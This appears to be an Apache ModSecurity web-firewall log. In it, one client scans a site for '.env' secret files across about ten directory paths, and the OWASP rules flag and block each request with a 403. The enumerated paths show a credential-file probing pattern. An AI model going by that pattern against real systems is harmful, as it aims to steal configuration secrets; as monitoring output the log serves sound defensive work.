[Mon May 11 16:33:27.973513 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/app/.env"] [unique_id "agHot0WKUxpmnkK7zHx_IAAAAQs"]
[Mon May 11 16:33:27.973907 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/app/.env"] [unique_id "agHot0WKUxpmnkK7zHx_IAAAAQs"]
[Mon May 11 16:33:27.974104 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/app/.env"] [unique_id "agHot0WKUxpmnkK7zHx_IAAAAQs"]
[Mon May 11 16:33:27.974377 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/app/.env"] [unique_id "agHot0WKUxpmnkK7zHx_IAAAAQs"]
[Mon May 11 16:33:28.132035 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/apps/.env"] [unique_id "agHouEWKUxpmnkK7zHx_IQAAAQs"]
[Mon May 11 16:33:28.132443 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/apps/.env"] [unique_id "agHouEWKUxpmnkK7zHx_IQAAAQs"]
[Mon May 11 16:33:28.132635 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/apps/.env"] [unique_id "agHouEWKUxpmnkK7zHx_IQAAAQs"]
[Mon May 11 16:33:28.132894 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/apps/.env"] [unique_id "agHouEWKUxpmnkK7zHx_IQAAAQs"]
[Mon May 11 16:33:28.289463 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/api/.env"] [unique_id "agHouEWKUxpmnkK7zHx_IgAAAQs"]
[Mon May 11 16:33:28.289952 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/api/.env"] [unique_id "agHouEWKUxpmnkK7zHx_IgAAAQs"]
[Mon May 11 16:33:28.290142 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/api/.env"] [unique_id "agHouEWKUxpmnkK7zHx_IgAAAQs"]
[Mon May 11 16:33:28.290407 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/api/.env"] [unique_id "agHouEWKUxpmnkK7zHx_IgAAAQs"]
[Mon May 11 16:33:28.449693 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/web/.env"] [unique_id "agHouEWKUxpmnkK7zHx_IwAAAQs"]
[Mon May 11 16:33:28.450083 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/web/.env"] [unique_id "agHouEWKUxpmnkK7zHx_IwAAAQs"]
[Mon May 11 16:33:28.450282 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/web/.env"] [unique_id "agHouEWKUxpmnkK7zHx_IwAAAQs"]
[Mon May 11 16:33:28.450531 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/web/.env"] [unique_id "agHouEWKUxpmnkK7zHx_IwAAAQs"]
[Mon May 11 16:33:28.610584 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/site/.env"] [unique_id "agHouEWKUxpmnkK7zHx_JAAAAQs"]
[Mon May 11 16:33:28.610926 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/site/.env"] [unique_id "agHouEWKUxpmnkK7zHx_JAAAAQs"]
[Mon May 11 16:33:28.611101 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/site/.env"] [unique_id "agHouEWKUxpmnkK7zHx_JAAAAQs"]
[Mon May 11 16:33:28.611329 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/site/.env"] [unique_id "agHouEWKUxpmnkK7zHx_JAAAAQs"]
[Mon May 11 16:33:28.768653 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/public/.env"] [unique_id "agHouEWKUxpmnkK7zHx_JQAAAQs"]
[Mon May 11 16:33:28.769032 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/public/.env"] [unique_id "agHouEWKUxpmnkK7zHx_JQAAAQs"]
[Mon May 11 16:33:28.769230 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/public/.env"] [unique_id "agHouEWKUxpmnkK7zHx_JQAAAQs"]
[Mon May 11 16:33:28.769481 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/public/.env"] [unique_id "agHouEWKUxpmnkK7zHx_JQAAAQs"]
[Mon May 11 16:33:28.930334 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/admin/.env"] [unique_id "agHouEWKUxpmnkK7zHx_JwAAAQs"]
[Mon May 11 16:33:28.930712 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/admin/.env"] [unique_id "agHouEWKUxpmnkK7zHx_JwAAAQs"]
[Mon May 11 16:33:28.930902 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/admin/.env"] [unique_id "agHouEWKUxpmnkK7zHx_JwAAAQs"]
[Mon May 11 16:33:28.931130 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/admin/.env"] [unique_id "agHouEWKUxpmnkK7zHx_JwAAAQs"]
[Mon May 11 16:33:29.087234 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/backend/.env"] [unique_id "agHouUWKUxpmnkK7zHx_KAAAAQs"]
[Mon May 11 16:33:29.087631 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/backend/.env"] [unique_id "agHouUWKUxpmnkK7zHx_KAAAAQs"]
[Mon May 11 16:33:29.087829 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/backend/.env"] [unique_id "agHouUWKUxpmnkK7zHx_KAAAAQs"]
[Mon May 11 16:33:29.088075 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/backend/.env"] [unique_id "agHouUWKUxpmnkK7zHx_KAAAAQs"]
[Mon May 11 16:33:29.244375 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/server/.env"] [unique_id "agHouUWKUxpmnkK7zHx_KQAAAQs"]
[Mon May 11 16:33:29.244750 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/server/.env"] [unique_id "agHouUWKUxpmnkK7zHx_KQAAAQs"]
[Mon May 11 16:33:29.244937 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/server/.env"] [unique_id "agHouUWKUxpmnkK7zHx_KQAAAQs"]
[Mon May 11 16:33:29.245198 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/server/.env"] [unique_id "agHouUWKUxpmnkK7zHx_KQAAAQs"]
